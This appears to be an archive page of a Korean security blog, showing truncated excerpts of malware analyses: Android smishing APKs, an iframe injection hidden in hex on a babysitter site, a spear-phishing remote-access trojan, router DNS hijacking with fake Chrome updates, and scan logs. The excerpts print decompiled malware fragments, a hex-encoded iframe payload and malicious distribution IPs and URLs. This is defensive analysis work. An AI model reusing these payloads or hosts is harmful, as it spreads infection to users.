일 | 월 | 화 | 수 | 목 | 금 | 토 |
---|---|---|---|---|---|---|
1 | 2 | 3 | 4 | |||
5 | 6 | 7 | 8 | 9 | 10 | 11 |
12 | 13 | 14 | 15 | 16 | 17 | 18 |
19 | 20 | 21 | 22 | 23 | 24 | 25 |
26 | 27 | 28 | 29 | 30 | 31 |
- esbuild
- hash
- 변태는
- 보이스피싱 #대검찰청 #명의도용 #비밀번호 #계좌번호 #공공기관 #가짜검찰청
- 채팅환전사기
- 스캠
- https
- XSS
- shell_gpt
- md5
- ssrf
- 허리디스크
- 척추관협착증
- CryptoJS
- self-signed
- 사진도용
- sha256
- Craco
- MongoDB #NoSQL #CreateUser #DropUser #mongod #mognod.conf
- open redirect
- 모의해킹
- react
- decrypt
- speed-measure-webpack-plugin
- CJ대한통운 #쿠팡 #통관번호오류 #통관고유번호오류 #안주원팀장 #모건인베스트
- Malware Sample
- 취약점
- 로맨스스캠
- 많다..
- NUGU
- Today
- Total
목록전체 글 (212)
annyoung
단축 URL과 개인서버를 사용하여 유포중이다.bit.ly/1QjzEjT 캡챠를 사용하여 자동 크롤링 방지 FileName com.spo.plus.plus.apk MD5 82A7B070E5F7DA62297B7F7448BC5C51 SHA-1 FBF45A32D4B50169C6E5BA6547CA13E8CCB0C862 Packer X드랍되는 어플리케이션은 위의 정보와 같다. 패킹도 안되어 있고 거의 기본으로 되어 있는 귀여운 어플리케이션이다. public class AppContext extends Application{ public static final String BASEDIR = Environment.getExternalStorageDirectory().toString() + "/Download"; pub..
고운빛 베이비시터 사이트에서 iframe을 사용하여 몰래 유포 중이다. 코드 더럽게 길네.. hex로 인코딩되어 복호화 하게 된다.복호화 하는 방법은 대체적으로 간단하다. >>> hexList = ['\x66\x61\x6b\x65\x3d','\x66\x61\x6b\x65\x3d\x59\x65\x73\x3b\x70\x61\x74\x68\x3d\x2f\x3b\x65\x78\x70\x69\x72\x65\x73\x3d',"\x3c\x69\x66\x72\x61\x6d\x65\x20\x73\x72\x63\x3d\x68\x74\x74\x70\x3a\x2f\x2f\x32\x31\x31\x2e\x35\x38\x2e\x32\x35\x35\x2e\x32\x31\x39\x2f\x75\x73\x61\x2f\x6d\x79\x67..
이메일을 통해서 첨부된 악성코드(흔히 말하는 기업에서의 스피어 피싱)를 분석하려고 한다. 샘플 수집의 경로는 몇 일전 TLS callback에 대해서 물어봐주셨던 분에게 메일을 통해서 받았다. FileName fax_info.exe MD5 99750A17CF9141BB10BD537BEC0A2DB0 SHA-1 7F16CB193145C69D49C19F4CEA08134AC8862CDD Packer X 압축을 사용하여 1차적으로 백신 우회를 하였고, pdf icon으로 위장하여 피해자가 실행하게 끔 된 바이너리다. IAT만 봐도 작은 기능을 제외하고 큰 기능을 먼저 보자면 원격제어 기능을 가지고 있는 악성코드라는 것을 알 수 있다. 이유는 다음 내용에 설명하겠다. void *__stdcall sub_401560..
한 3일전부터 8080포트로 운영하고 있는 웹서버 인데, 귀여운 로그가 찍혔다. 80.98.171.*** - - [27/May/2015:17:19:49 +0900] "GET /Ringing.at.your.dorbell! HTTP/1.0" 404 222Ringing at your doorbell!! 80.98.171.*** - - [27/May/2015:17:19:52 +0900] "GET /Diagnostics.asp HTTP/1.0" 404 213 그리고 내 서버는 apache+php인데 asp로 접근하다니.. 무튼 귀여운 헝가리 친구였다.
http://67.198.144.251 한층 개선된 chrome의 최신버전이 출시되었습니다. 업데이트 후 이용해주십시오. 마침 지인이 공유기가 해킹 당해서 샘플을 빠르게 얻을 수 있었다. SNS에서는 "크롬 바이러스"라고 알려져 있는 것 같다. 크롬 바이러스가 아니라 공유기의 허술한 설정으로 인해 공유기 DNS 변조가 되어 악성코드가 유포되고 있는 것이다.. 이러한 일이 왜 일어나냐면, 위에서도 말했듯이 공유기의 허술한 설정으로 인하여 공유기 DNS가 변조되었기 때문이다. 공유기가 해킹되는 취약한 설정 1. 원격 관리 설정을 해놓은 경우 (외부에서 공유기 관리 페이지에 접근이 가능해짐.) 2. 공유기에 아이디/비밀번호가 설정이 되어 있지 않거나 기본 아이디/패스워드일 경우 3. 취약한 버전의 공유기를 쓰..
FileName avref.apk MD5 F5439A55FAA1DB7EEB3F85D4DCEBE013 SHA-1 9E915732B7A1314FFE06C20D769F9A390C331B94 Packer X 어디서 굴러들어온 녀석인진 모르겠다만, 정보유출지가 차단되어 쓸모없는 녀석이 되어 버렸다. 기기 관리자 활성화 + 원격제어(파일 다운, 설치, 제거, 문자 보내기, 연락처 유출 등) + 스미싱(뱅킹 정보 유출, 인증서 유출 등)이 사용되는 샘플이였다. package com.a;import android.app.admin.DeviceAdminReceiver;import android.content.Context;import android.content.Intent; public class MyAdminRece..
2.230.101.197 - - [17/Feb/2015:02:57:42 +0900] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 219 68.251.212.152 - - [17/Feb/2015:06:04:20 +0900] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 219 188.15.169.236 - - [17/Feb/2015:06:34:08 +0900] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 219 183.178.12.50 - - [17/Feb/2015:07:12:52 +0900] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 219 94.160.217.5 - - [17/Feb..
맥으로 분석하면 참 쉽다. 악성코드 감염에 거의 걱정하지 않아도 되고 소스보기를 이용해서 디코딩된 결과를 볼 수도 있고. java applet을 이용하여 exploit을 시도한다. value를 참조하여 악성코드를 다운 및 실행하여 자동으로 감염 시킨다. 무슨 exploit인지 궁금한 분들은 MvJwWu.jar를 분석해보면 된다.(여기까지 깊게 나가진 않겠음) FileName win.exe MD5 B5B7DB16FF7AD62A387E1BFC9EEED959 SHA-1 84EF6838A7DF06415DC3CF19D38B2BFDB142EDF4 Packer nsPack ver 3.x-4.1 reg by North Star 유포지 hxxp://sanaesan.com/after_img/win.exe Packer가 b..
몇일전 메일로 분석 문의가 들어와서 급하게 써본다.. TLS callback을 어떻게 bypass를 하냐는 문의였는데 솔직히 TLS callback(), IsDebuggerPresent()를 사용해서 안티 디버깅 하는건 나도 몰랐던 부분인데 덕분에 공부도 하고 좋았던 것 같다. TLS callback을 사용하는 악성코드를 어떻게 우회를 하냐며 여러 샘플을 보내주셨는데 한두개 정도 우회 하는 방법에 대해서 설명하려고 한다. 샘플1, loa.exe FileName loa.exe MD5 B3677D1BA7DD15C842D0A0DA4778719A SHA-1 C7C94FFA1DD05CF8F29E9B88FB034E58D4691609 Pack VMProtect v.2.07[표1] TLS callback을 사용하는 샘..
FileName ajk.exe MD5 3CEB54A7BCA642F7A5E997A96F603A40 SHA-1 4EFD870132D70901850E569DB9939BB2B837737E Packer VMProtet 2.0x 여기도 exploit이 업로드 되어 있는건 아니고 바이너리만 업로드되어 유포지로 사용중. .C...........www.pinterest.com..... .C...........www.pinterest.com..................www.pinterest.com.edgekey.net../......+....e9343.aakamaiedge.I.Z.............9 블로그와 비슷한 기능을 가진 pinterest.com에 DNS 쿼리를 날린다. https://www.pintere..